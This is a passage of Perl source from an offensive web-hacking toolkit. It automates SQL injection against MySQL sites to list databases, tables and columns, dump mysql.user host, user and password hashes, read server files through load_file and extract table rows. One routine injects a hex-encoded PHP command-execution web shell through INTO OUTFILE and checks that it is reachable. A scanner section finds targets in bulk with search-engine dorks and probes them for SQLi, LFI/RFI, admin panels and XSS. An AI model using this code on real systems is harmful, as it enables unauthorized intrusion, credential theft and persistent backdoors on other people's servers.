  2346. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2347.         $code = toma(
  2348.             $page . $pass1 . "from" . $pass1 . "information_schema.schemata" );
  2349.         if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2350.             my $limita = $1;
  2351.             printear( "[+] Databases Length : $limita\n\n", "text", "13", "5" );
  2352.             savefilear( $save . ".txt", "[+] Databases Length : $limita\n" );
  2353.             $page1 =~
  2354. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2355.             $real = "1";
  2356.             for my $limit ( 0 .. $limita ) {
  2357.                 $code =
  2358.                   toma( $page1
  2359.                       . $pass1 . "from"
  2360.                       . $pass1
  2361.                       . "information_schema.schemata"
  2362.                       . $pass1 . "limit"
  2363.                       . $pass1
  2364.                       . $limit . ",1"
  2365.                       . $pass2 );
  2366.                 if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2367.                     my $control = $1;
  2368.                     if (    $control ne "information_schema"
  2369.                         and $control ne "mysql"
  2370.                         and $control ne "phpmyadmin" )
  2371.                     {
  2372.                         printear(
  2373.                             "[Database $real Found] $control\n", "text",
  2374.                             "7",                                 "5"
  2375.                         );
  2376.                         savefilear( $save . ".txt",
  2377.                             "[Database $real Found] : $control" );
  2378.                         $real++;
  2379.                     }
  2380.                 }
  2381.             }
  2382.         }
  2383.         else {
  2384.             printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
  2385.         }
  2386.     }
  2387.  
  2388.     sub schematablesdb {
  2389.         my $page  = $_[0];
  2390.         my $db    = $_[2];
  2391.         my $page1 = $page;
  2392.         savefilear( $_[3] . ".txt", "\n" );
  2393.         printear( "\n\n[+] Searching tables with DB $db\n\n",
  2394.             "text", "13", "5" );
  2395.         ( $pass1, $pass2 ) = &bypass( $_[1] );
  2396.         savefilear( $_[3] . ".txt", "[DB] : $db" );
  2397.         $page =~
  2398. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2399.         $page1 =~
  2400. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2401.         $code =
  2402.           toma( $page1
  2403.               . $pass1 . "from"
  2404.               . $pass1
  2405.               . "information_schema.tables"
  2406.               . $pass1 . "where"
  2407.               . $pass1
  2408.               . "table_schema=char("
  2409.               . ascii($db) . ")"
  2410.               . $pass2 );
  2411.  
  2412. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  2413.         if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2414.             printear( "[+] Tables Length :  $1\n\n", "text", "13", "5" );
  2415.             savefilear( $_[3] . ".txt", "[+] Tables Length :  $1\n" );
  2416.             my $limit = $1;
  2417.             $real = "1";
  2418.             for my $lim ( 0 .. $limit ) {
  2419.                 $code1 =
  2420.                   toma( $page
  2421.                       . $pass1 . "from"
  2422.                       . $pass1
  2423.                       . "information_schema.tables"
  2424.                       . $pass1 . "where"
  2425.                       . $pass1
  2426.                       . "table_schema=char("
  2427.                       . ascii($db) . ")"
  2428.                       . $pass1 . "limit"
  2429.                       . $pass1
  2430.                       . $lim . ",1"
  2431.                       . $pass2 );
  2432.  
  2433. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  2434.                 if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2435.                     my $table = $1;
  2436.                     chomp $table;
  2437.                     savefilear( $_[3] . ".txt",
  2438.                         "[Table $real Found : $table ]" );
  2439.                     printear( "[Table $real Found : $table ]\n",
  2440.                         "text", "7", "5" );
  2441.                     $real++;
  2442.                 }
  2443.             }
  2444.         }
  2445.         else {
  2446.             printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
  2447.         }
  2448.     }
  2449.  
  2450.     sub schemacolumnsdb {
  2451.         my ( $page, $bypass, $db, $table, $save ) = @_;
  2452.         my $page3 = $page;
  2453.         my $page4 = $page;
  2454.         printear( "\n\n[+] Searching columns in table $table with DB $db\n\n",
  2455.             "text", "13", "5" );
  2456.         savefilear( $save . ".txt", "\n" );
  2457.         ( $pass1, $pass2 ) = &bypass( $_[1] );
  2458.         savefilear( $save . ".txt", "\n[DB] : $db" );
  2459.         savefilear( $save . ".txt", "[Table] : $table" );
  2460.         $page3 =~
  2461. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2462.         $code3 =
  2463.           toma( $page3
  2464.               . $pass1 . "from"
  2465.               . $pass1
  2466.               . "information_schema.columns"
  2467.               . $pass1 . "where"
  2468.               . $pass1
  2469.               . "table_name=char("
  2470.               . ascii($table) . ")"
  2471.               . $pass1 . "and"
  2472.               . $pass1
  2473.               . "table_schema=char("
  2474.               . ascii($db) . ")"
  2475.               . $pass2 );
  2476.  
  2477.         if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2478.             printear( "\n[Columns length : $1 ]\n\n", "text", "13", "5" );
  2479.             savefilear( $save . ".txt", "[Columns length : $1 ]\n" );
  2480.             my $si = $1;
  2481.             chomp $si;
  2482.             $page4 =~
  2483. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2484.             $real = "1";
  2485.             for my $limit2 ( 0 .. $si ) {
  2486.                 $code4 =
  2487.                   toma( $page4
  2488.                       . $pass1 . "from"
  2489.                       . $pass1
  2490.                       . "information_schema.columns"
  2491.                       . $pass1 . "where"
  2492.                       . $pass1
  2493.                       . "table_name=char("
  2494.                       . ascii($table) . ")"
  2495.                       . $pass1 . "and"
  2496.                       . $pass1
  2497.                       . "table_schema=char("
  2498.                       . ascii($db) . ")"
  2499.                       . $pass1 . "limit"
  2500.                       . $pass1
  2501.                       . $limit2 . ",1"
  2502.                       . $pass2 );
  2503.                 if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2504.                     printear( "[Column $real] : $1\n", "text", "7", "5" );
  2505.                     savefilear( $save . ".txt", "[Column $real] : $1" );
  2506.                     $real++;
  2507.                 }
  2508.             }
  2509.         }
  2510.         else {
  2511.             printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
  2512.         }
  2513.     }
  2514.  
  2515.     sub mysqluser {
  2516.         my ( $page, $bypass, $save ) = @_;
  2517.         my $cop  = $page;
  2518.         my $cop1 = $page;
  2519.         savefilear( $save . ".txt", "\n" );
  2520.         printear( "\n\n[+] Finding mysql.users\n", "text", "13", "5" );
  2521.         ( $pass1, $pass2 ) = &bypass($bypass);
  2522.         $page =~ s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  2523.         $code =
  2524.           toma( $page . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
  2525.  
  2526.         if ( $code =~ /RATSXPDOWN/ig ) {
  2527.             $cop1 =~
  2528. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2529.             $code1 =
  2530.               toma( $cop1 . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
  2531.             if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2532.                 printear( "\n[+] Users Found : $1\n\n", "text", "13", "5" );
  2533.                 savefilear( $save . ".txt", "\n[+] Users mysql Found : $1\n" );
  2534.                 for my $limit ( 0 .. $1 ) {
  2535.                     $cop =~
  2536. s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  2537.                     $code =
  2538.                       toma( $cop
  2539.                           . $pass1 . "from"
  2540.                           . $pass1
  2541.                           . "mysql.user"
  2542.                           . $pass1 . "limit"
  2543.                           . $pass1
  2544.                           . $limit . ",1"
  2545.                           . $pass2 );
  2546.                     if ( $code =~
  2547.                         /RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig
  2548.                       )
  2549.                     {
  2550.                         printear( "[Host] : $1 [User] : $2 [Password] : $3\n",
  2551.                             "text", "7", "5" );
  2552.                         savefilear( $save . ".txt",
  2553.                             "[Host] : $1 [User] : $2 [Password] : $3" );
  2554.                     }
  2555.                     else {
  2556.                         &reload;
  2557.                     }
  2558.                 }
  2559.             }
  2560.         }
  2561.         else {
  2562.             printear( "\n[-] mysql.user = ERROR\n", "text", "5", "5" );
  2563.         }
  2564.     }
  2565.  
  2566.     sub fuzz {
  2567.         my $page = $_[0];
  2568.         ( $pass1, $pass2 ) = &bypass( $_[1] );
  2569.         my $count = "0";
  2570.         savefilear( $_[2] . ".txt", "\n" );
  2571.         print "\n";
  2572.         if ( $_[0] =~ /(.*)hackman(.*)/g ) {
  2573.             my $start = $1;
  2574.             my $end   = $2;
  2575.             printear( "\n[+] Searching tables.....\n\n", "text", "13", "5" );
  2576.             for my $table (@buscar2) {
  2577.                 chomp $table;
  2578.                 $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
  2579.                 $injection =
  2580.                     $start
  2581.                   . $concat
  2582.                   . $end
  2583.                   . $pass1 . "from"
  2584.                   . $pass1
  2585.                   . $table
  2586.                   . $pass2;
  2587.                 $code = toma($injection);
  2588.                 if ( $code =~ /ERTOR854/g ) {
  2589.                     $count++;
  2590.                     printear( "[Table Found] : $table\n", "text", "7", "5" );
  2591.                     savefilear( $_[2] . ".txt", "[Table Found] : $table" );
  2592.                 }
  2593.             }
  2594.         }
  2595.         if ( $count eq "0" ) {
  2596.             printear( "[-] Not found any table\n", "text", "5", "5" );
  2597.             &reload;
  2598.         }
  2599.     }
  2600.  
  2601.     sub fuzzcol {
  2602.         my $page = $_[0];
  2603.         ( $pass1, $pass2 ) = &bypass( $_[1] );
  2604.         my $count = "0";
  2605.         savefilear( $_[3] . ".txt", "\n" );
  2606.         print "\n";
  2607.         if ( $_[0] =~ /(.*)hackman(.*)/ ) {
  2608.             my $start = $1;
  2609.             my $end   = $2;
  2610.             printear( "\n[+] Searching columns for the table $_[2]...\n\n\n",
  2611.                 "text", "13", "5" );
  2612.             savefilear( $_[3] . ".txt", "[Table] : $_[2]" );
  2613.             for my $columns (@buscar1) {
  2614.                 chomp $columns;
  2615.                 $concat =
  2616. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
  2617.                 $code =
  2618.                   toma( $start
  2619.                       . $concat
  2620.                       . $end
  2621.                       . $pass1 . "from"
  2622.                       . $pass1
  2623.                       . $_[2]
  2624.                       . $pass2 );
  2625.                 if ( $code =~ /ERTOR854/g ) {
  2626.                     printear( "[Column Found] : $columns\n", "text", "7", "5" );
  2627.                     savefilear( $_[3] . ".txt", "[Column Found] : $columns" );
  2628.                 }
  2629.             }
  2630.         }
  2631.         if ( $count eq "0" ) {
  2632.             printear( "[-] Not found any column\n", "text", "5", "5" );
  2633.             &reload;
  2634.         }
  2635.     }
  2636.  
  2637.     sub load {
  2638.         savefilear( $_[2] . ".txt", "\n" );
  2639.         print "\n";
  2640.         ( $pass1, $pass2 ) = &bypass( $_[1] );
  2641.         if ( $_[0] =~ /(.*)hackman(.*)/g ) {
  2642.             printear(
  2643.                 "\n[+] Searching files with load_file...\n\n\n", "text",
  2644.                 "13",                                            "5"
  2645.             );
  2646.             my $start = $1;
  2647.             my $end   = $2;
  2648.             for my $file (@files) {
  2649.                 chomp $file;
  2650.                 $concat =
  2651.                     "unhex(hex(concat(char(107,48,98,114,97),load_file("
  2652.                   . encode($file)
  2653.                   . "),char(107,48,98,114,97))))";
  2654.                 my $code = toma( $start . $concat . $end . $pass2 );
  2655.                 chomp $code;
  2656.                 if ( $code =~ /k0bra(.*)k0bra/s ) {
  2657.                     printear( "[File Found] : $file\n", "text", "11", "5" );
  2658.                     printear( "\n[Source Start]\n\n",   "text", "7",  "5" );
  2659.                     printear( "$1",                     "text", "7",  "5" );
  2660.                     printear( "\n\n[Source End]\n\n",   "text", "7",  "5" );
  2661.                     savefilear( $_[2] . ".txt", "[File Found] : $file" );
  2662.                     savefilear( $_[2] . ".txt", "\n[Source Start]\n" );
  2663.                     savefilear( $_[2] . ".txt", "$1" );
  2664.                     savefilear( $_[2] . ".txt", "\n[Source End]\n" );
  2665.                 }
  2666.             }
  2667.         }
  2668.     }
  2669.  
  2670.     sub loadfile {
  2671.         savefilear( $_[2] . ".txt", "\n" );
  2672.         ( $pass1, $pass2 ) = &bypass( $_[1] );
  2673.         if ( $_[0] =~ /(.*)hackman(.*)/g ) {
  2674.             my $start = $1;
  2675.             my $end   = $2;
  2676.             my $file =
  2677.               printear( "\n\n[+] File to read : ", "stdin", "11", "13" );
  2678.             $concat =
  2679.                 "unhex(hex(concat(char(107,48,98,114,97),load_file("
  2680.               . encode($file)
  2681.               . "),char(107,48,98,114,97))))";
  2682.             my $code = toma( $start . $concat . $end . $pass2 );
  2683.             chomp $code;
  2684.             if ( $code =~ /k0bra(.*)k0bra/s ) {
  2685.                 printear( "\n[File Found] : $file\n", "text", "11", "5" );
  2686.                 printear( "\n[Source Start]\n\n",     "text", "7",  "5" );
  2687.                 printear( "$1",                       "text", "7",  "5" );
  2688.                 printear( "\n\n[Source End]\n\n",     "text", "7",  "5" );
  2689.                 savefilear( $_[2] . ".txt", "[File Found] : $file" );
  2690.                 savefilear( $_[2] . ".txt", "\n[Source Start]\n" );
  2691.                 savefilear( $_[2] . ".txt", "$1" );
  2692.                 savefilear( $_[2] . ".txt", "\n[Source End]\n" );
  2693.             }
  2694.         }
  2695.     }
  2696.  
  2697.     sub dump {
  2698.         savefilear( $_[5] . ".txt", "\n" );
  2699.         my $page = $_[0];
  2700.         ( $pass1, $pass2 ) = &bypass( $_[4] );
  2701.         if ( $page =~ /(.*)hackman(.*)/ ) {
  2702.             my $start = $1;
  2703.             my $end   = $2;
  2704.             printear( "[+] Extracting values...\n\n", "text", "13", "5" );
  2705.             $concatx =
  2706. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  2707.             $val_code =
  2708.               toma( $start
  2709.                   . $concatx
  2710.                   . $end
  2711.                   . $pass1 . "from"
  2712.                   . $pass1
  2713.                   . $_[3]
  2714.                   . $pass2 );
  2715.             $concat =
  2716. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  2717.             if ( $val_code =~ /ERTOR854(.*)ERTOR854/ig ) {
  2718.                 $tota = $1;
  2719.                 printear( "[+] Length of the rows : $tota\n\n",
  2720.                     "text", "13", "5" );
  2721.                 printear( "[+] Extracting values...\n\n", "text", "13", "5" );
  2722.                 printear( "[$_[1]] [$_[2]]\n\n",          "text", "13", "5" );
  2723.                 savefilear( $_[5] . ".txt", "[Table] : $_[3]" );
  2724.                 savefilear( $_[5] . ".txt", "[+] Length of the rows: $tota\n" );
  2725.                 savefilear( $_[5] . ".txt", "[$_[1]] [$_[2]]\n" );
  2726.                 for my $limit ( 0 .. $tota ) {
  2727.                     chomp $limit;
  2728.                     $injection =
  2729.                       toma( $start
  2730.                           . $concat
  2731.                           . $end
  2732.                           . $pass1 . "from"
  2733.                           . $pass1
  2734.                           . $_[3]
  2735.                           . $pass1 . "limit"
  2736.                           . $pass1
  2737.                           . $limit . ",1"
  2738.                           . $pass2 );
  2739.                     if ( $injection =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854/ig ) {
  2740.                         savefilear( $_[5] . ".txt",
  2741.                             "[$_[1]] : $1   [$_[2]] : $2" );
  2742.                         printear(
  2743.                             "[$_[1]] : $1   [$_[2]] : $2\n", "text",
  2744.                             "7",                             "5"
  2745.                         );
  2746.                     }
  2747.                     else {
  2748.                         printear(
  2749.                             "\n\n[+] Extracting Finish\n", "text",
  2750.                             "13",                          "5"
  2751.                         );
  2752.                         &reload;
  2753.                     }
  2754.                 }
  2755.             }
  2756.             else {
  2757.                 printear( "[-] Not Found any DATA\n\n", "text", "5", "5" );
  2758.             }
  2759.         }
  2760.     }
  2761.  
  2762.     sub into {
  2763.         printear( "\n\n[Status] : Injecting a SQLI for create a shell\n",
  2764.             "text", "13", "5" );
  2765.         my ( $page, $bypass, $dir, $save ) = @_;
  2766.         savefilear( $save . ".txt", "\n" );
  2767.         print "\n";
  2768.         ( $pass1, $pass2 ) = &bypass($bypass);
  2769.         my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  2770.         if ( $path =~ /\/(.*)$/ ) {
  2771.             my $path1 = $1;
  2772.             my $path2 = $path1;
  2773.             $path2 =~ s/$1//;
  2774.             $dir   =~ s/$path1//ig;
  2775.             $shell = $dir . "/" . "shell.php";
  2776.             if ( $page =~ /(.*)hackman(.*)/ig ) {
  2777.                 my ( $start, $end ) = ( $1, $2 );
  2778.                 $code =
  2779.                   toma( $start
  2780.                       . "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  2781.                       . $end
  2782.                       . $pass1 . "into"
  2783.                       . $pass1
  2784.                       . "outfile"
  2785.                       . $pass1 . "'"
  2786.                       . $shell . "'"
  2787.                       . $pass2 );
  2788.                 $code1 =
  2789.                   toma( "http://" . $auth . "/" . $path2 . "/" . "shell.php" );
  2790.                 if ( $code1 =~ /Mini Shell By Doddy/ig ) {
  2791.                     printear(
  2792.                         "[Shell Up] : http://"
  2793.                           . $auth . "/"
  2794.                           . $path2 . "/"
  2795.                           . "shell.php" . "\a\a",
  2796.                         "text", "7", "5"
  2797.                     );
  2798.                     savefilear(
  2799.                         $save . ".txt",
  2800.                         "[shell up] : http://"
  2801.                           . $auth . "/"
  2802.                           . $path2 . "/"
  2803.                           . "shell.php"
  2804.                     );
  2805.                 }
  2806.                 else {
  2807.                     printear( "[Shell] : Not Found", "text", "5", "5" );
  2808.                 }
  2809.             }
  2810.         }
  2811.     }
  2812.  
  2813. }    ##
  2814.  
  2815. sub load_paranoic_old {
  2816.  
  2817.     installer_par();
  2818.     staq();
  2819.  
  2820.     sub staq {
  2821.  
  2822.         sub head_scan {
  2823.             clean();
  2824.             printear( "
  2825.  
  2826.  
  2827.  @@@    @@@@    @    @    @  @    @  @@@@@  @@@@@
  2828. @   @  @    @   @    @@   @  @@   @  @      @    @
  2829. @      @       @ @   @@   @  @@   @  @      @    @
  2830. @      @       @ @   @ @  @  @ @  @  @      @    @
  2831.  @@@   @      @   @  @ @  @  @ @  @  @@@@   @@@@@
  2832.     @  @      @   @  @  @ @  @  @ @  @      @    @
  2833.     @  @      @@@@@  @   @@  @   @@  @      @    @
  2834. @   @  @    @@     @ @   @@  @   @@  @      @    @
  2835.  @@@    @@@@ @     @ @    @  @    @  @@@@@  @    @
  2836.  
  2837.  
  2838.  
  2839.  
  2840. ", "text", "7", "5" );
  2841.         }
  2842.  
  2843.         &menu_sca;
  2844.  
  2845.         sub menu_sca {
  2846.             &head_scan;
  2847.             printear( "[a] : Scan a File\n", "text", "13", "5" );
  2848.             printear(
  2849.                 "[b] : Search in Google and scan the webs\n", "text",
  2850.                 "13",                                         "5"
  2851.             );
  2852.             printear(
  2853.                 "[c] : Search in Bing and scan the webs\n\n", "text",
  2854.                 "13",                                         "5"
  2855.             );
  2856.             my $op = printear( "[option] : ", "stdin", "11", "13" );
  2857.  
  2858.             scan($op);
  2859.  
  2860.         }
  2861.  
  2862.         sub scan {
  2863.  
  2864.             my $count;
  2865.             my $option;
  2866.             my $op = shift;
  2867.             my @paginas;
  2868.  
  2869.             if ( $op =~ /a/ig ) {
  2870.  
  2871.                 my $word = printear( "\n[+] Wordlist : ", "stdin", "11", "13" );
  2872.  
  2873.                 @paginas = repes( cortar( savewords($word) ) );
  2874.  
  2875.                 $option = &men;
  2876.  
  2877.                 if ( $option =~ /Q/ig ) {
  2878.                     $count =
  2879.                       printear( "\n[+] Panels Count : ", "stdin", "11", "13" );
  2880.                 }
  2881.  
  2882.             }
  2883.  
  2884.             elsif ( $op =~ /b/ig ) {
  2885.  
  2886.                 my $dork = printear( "\n[+] Dork : ",  "stdin", "11", "13" );
  2887.                 my $pag  = printear( "\n[+] Pages : ", "stdin", "11", "13" );
  2888.                 $option = &men;
  2889.  
  2890.                 if ( $option =~ /Q/ig ) {
  2891.                     $count =
  2892.                       printear( "\n[+] Panels Count : ", "stdin", "11", "13" );
  2893.                 }
  2894.  
  2895.                 printear( "\n\n[+] Searching in Google\n", "text", "13", "5" );
  2896.  
  2897.                 @paginas = &google( $dork, $pag );
  2898.  
  2899.             }
  2900.  
  2901.             elsif ( $op =~ /c/ig ) {
  2902.                 my $dork = printear( "\n[+] Dork : ",  "stdin", "11", "13" );
  2903.                 my $pag  = printear( "\n[+] Pages : ", "stdin", "11", "13" );
  2904.                 $option = &men;
  2905.  
  2906.                 if ( $option =~ /Q/ig ) {
  2907.                     $count =
  2908.                       printear( "\n[+] Panels Count : ", "stdin", "11", "13" );
  2909.                 }
  2910.  
  2911.                 printear( "\n\n[+] Searching in Bing\n", "text", "13", "5" );
  2912.  
  2913.                 @paginas = &bing( $dork, $pag );
  2914.  
  2915.             }
  2916.  
  2917.             else {
  2918.                 &finish_now;
  2919.             }
  2920.  
  2921.             printear( "\n\n[Status] : Scanning\n", "text", "7", "5" );
  2922.             printear(
  2923.                 "[Webs Count] : " . int(@paginas) . "\n\n", "text",
  2924.                 "7",                                        "5"
  2925.             );
  2926.             for (@paginas) {
  2927.                 if ( $option =~ /S/ig ) {
  2928.                     scansql($_);
  2929.                 }
  2930.                 if ( $option =~ /K/ig ) {
  2931.                     sql($_);
  2932.                 }
  2933.                 if ( $option =~ /Q/ig ) {
  2934.                     sqladmin( $_, $count );
  2935.                 }
  2936.                 if ( $option =~ /Y/ig ) {
  2937.                     simple($_);
  2938.                 }
  2939.                 if ( $option =~ /L/ig ) {
  2940.                     lfi($_);
  2941.                 }
  2942.                 if ( $option =~ /R/ig ) {
  2943.                     rfi($_);
  2944.                 }
  2945.                 if ( $option =~ /F/ig ) {
  2946.                     fsd($_);
  2947.                 }
  2948.                 if ( $option =~ /X/ig ) {
  2949.                     scanxss($_);
  2950.                 }
  2951.                 if ( $option =~ /M/ig ) {
  2952.                     mssql($_);
  2953.                 }
  2954.                 if ( $option =~ /J/ig ) {
  2955.                     access($_);
  2956.                 }
  2957.                 if ( $option =~ /O/ig ) {
  2958.                     oracle($_);
  2959.                 }
  2960.                 if ( $option =~ /HT/ig ) {
  2961.                     http($_);
  2962.                 }
  2963.                 if ( $option =~ /A/ig ) {
  2964.                     scansql($_);
  2965.                     scanxss($_);
  2966.                     mssql($_);
  2967.                     access($_);
  2968.                     oracle($_);
  2969.                     lfi($_);
  2970.                     rfi($_);
  2971.                     fsd($_);
  2972.                     http($_);
  2973.                 }
  2974.             }
  2975.         }
  2976.         printear( "\n\n[Status] : Finish\n", "text", "13", "5" );
  2977.         &finish_now;
  2978.     }
  2979.  
  2980.     sub sql {
  2981.         my ( $pass1, $pass2 ) = ( "+", "--" );
  2982.         my $page = shift;
  2983.         $code1 =
  2984.           toma( $page . "-1"
  2985.               . $pass1 . "union"
  2986.               . $pass1
  2987.               . "select"
  2988.               . $pass1 . "666"
  2989.               . $pass2 );
  2990.         if ( $code1 =~
  2991.             /The used SELECT statements have a different number of columns/ig )
  2992.         {
  2993.             printear( "[+] SQLI : $page\a\n", "text", "11", "5" );
  2994.             savefile( "sql-logs.txt", $page );
  2995.         }
  2996.     }
  2997.  
  2998.     sub sqladmin {
  2999.  
  3000.         my ( $pass1, $pass2 ) = ( "+", "--" );
  3001.  
  3002.         my $page   = $_[0];
  3003.         my $limite = $_[1];
  3004.  
  3005.         if ( $limite eq "" ) {
  3006.             $limite = 3;
  3007.         }
  3008.  
  3009.         $code1 =
  3010.           toma( $page . "-1"
  3011.               . $pass1 . "union"
  3012.               . $pass1
  3013.               . "select"
  3014.               . $pass1 . "666"
  3015.               . $pass2 );
  3016.         if ( $code1 =~
  3017.             /The used SELECT statements have a different number of columns/ig )
  3018.         {
  3019.             printear( "\n[+] SQLI : $page\a\n", "text", "11", "5" );
  3020.             savefile( "sql-logs.txt", $page );
  3021.  
  3022.             my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  3023.  
  3024.             my $fage = "http://" . $auth;
  3025.  
  3026.             my $count = 0;
  3027.  
  3028.             for my $path (@paneles) {
  3029.  
  3030.                 if ( $count eq $limite ) {
  3031.                     last;
  3032.                 }
  3033.  
  3034.                 $code = tomados( $fage . "/" . $path );
  3035.  
  3036.                 if ( $code->is_success ) {
  3037.                     $controlt = 1;
  3038.                     $count++;
  3039.                     printear(
  3040.                         "[+] Link : " . $fage . "/" . $path . "\n", "text",
  3041.                         "11",                                       "5"
  3042.                     );
  3043.                     savefile( "admin-logs.txt", $fage . "/" . $path );
  3044.                 }
  3045.             }
  3046.         }
  3047.  
  3048.     }
  3049.  
  3050.     sub http {
  3051.  
  3052.         my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  3053.  
  3054.         my $socket = IO::Socket::INET->new(
  3055.             PeerAddr => $auth,
  3056.             PeerPort => "80",
  3057.             Proto    => "tcp"
  3058.         );
  3059.  
  3060.         print $socket "OPTIONS  / HTTP/1.0\r\n\r\n";
  3061.         read $socket, $resultado, "1000";
  3062.  
  3063.         if ( $resultado =~ /Server:(.*)/g ) {
  3064.             my $server = $1;
  3065.  
  3066.             printear( "\n[+] Page : $auth" . "\n",      "text", "11", "5" );
  3067.             printear( "[+] Server : " . $server . "\n", "text", "11", "5" );
  3068.  
  3069.             savefile( "http-logs.txt", "[+] Page : $auth" . "\n" );
  3070.             savefile( "http-logs.txt", "[+] Server : " . $server . "\n" );
  3071.         }
  3072.         if ( $resultado =~ /Allow: (.*)/g ) {
  3073.             my $options = $1;
  3074.  
  3075.             printear( "[+] Options : " . $options . "\n", "text", "11", "5" );
  3076.             savefile( "http-logs.txt", "[+] Options : " . $options . "\n" );
  3077.  
  3078.         }
  3079.         $socket->close;
  3080.     }
  3081.  
  3082.     sub scanxss {
  3083.  
  3084.         my $page = shift;
  3085.         chomp $page;
  3086.  
  3087.         my @testar = HTML::Form->parse( toma($page), "/" );
  3088.         my @botones_names;
  3089.         my @botones_values;
  3090.         my @orden;
  3091.         my @pa = (
  3092. "<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",
  3093. '"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>'
  3094.         );
  3095.         my @get_founds;
  3096.         my @post_founds;
  3097.         my @ordenuno;
  3098.         my @ordendos;
  3099.  
  3100.         my $contador_forms = 0;
  3101.  
  3102.         my $valor = "doddyhackman";
  3103.  
  3104.         for my $test (@testar) {
  3105.             $contador_forms++;
  3106.             if ( $test->method eq "POST" ) {
  3107.                 my @inputs = $test->inputs;
  3108.                 for my $in (@inputs) {
  3109.                     if ( $in->type eq "submit" ) {
  3110.                         if ( $in->name eq "" ) {
  3111.                             push( @botones_names, "submit" );
  3112.                         }
  3113.                         push( @botones_names,  $in->name );
  3114.                         push( @botones_values, $in->value );
  3115.                     }
  3116.                     else {
  3117.                         push( @ordenuno, $in->name, $pa[0] );
  3118.                         push( @ordendos, $in->name, $pa[1] );
  3119.                     }
  3120.                 }
  3121.  
  3122.                 for my $n ( 0 .. int(@botones_names) - 1 ) {
  3123.                     my @preuno = @ordenuno;
  3124.                     my @predos = @ordendos;
  3125.                     push( @preuno, $botones_names[$n], $botones_values[$n] );
  3126.                     push( @predos, $botones_names[$n], $botones_values[$n] );
  3127.  
  3128.                     my $codeuno = $nave->post( $page, \@preuno )->content;
  3129.                     my $codedos = $nave->post( $page, \@predos )->content;
  3130.                     if ( $codeuno =~
  3131. /<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig
  3132.                         or $codedos =~
  3133. /<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig
  3134.                       )
  3135.                     {
  3136.                         if (   $test->attr(name) eq ""
  3137.                             or $test->attr(name) eq " " )
  3138.                         {
  3139.                             push( @post_founds, $contador_forms );
  3140.                         }
  3141.                         else {
  3142.                             push( @post_founds, $test->attr(name) );
  3143.                         }
  3144.                     }
  3145.                 }
  3146.             }
  3147.             else {    #Fin de metodo POST
  3148.                 my @inputs = $test->inputs;
  3149.                 for my $in (@inputs) {
  3150.                     if ( $in->type eq "submit" ) {
  3151.                         if ( $in->name eq "" ) {
  3152.                             push( @botones_names, "submit" );
  3153.                         }
  3154.                         push( @botones_names,  $in->name );
  3155.                         push( @botones_values, $in->value );
  3156.                     }
  3157.                     else {
  3158.                         $orden .= '' . $in->name . '=' . $valor . '&';
  3159.                     }
  3160.                 }
  3161.                 chop($orden);
  3162.                 for my $n ( 0 .. int(@botones_names) - 1 ) {
  3163.                     my $partedos =
  3164.                       "&" . $botones_names[$n] . "=" . $botones_values[$n];
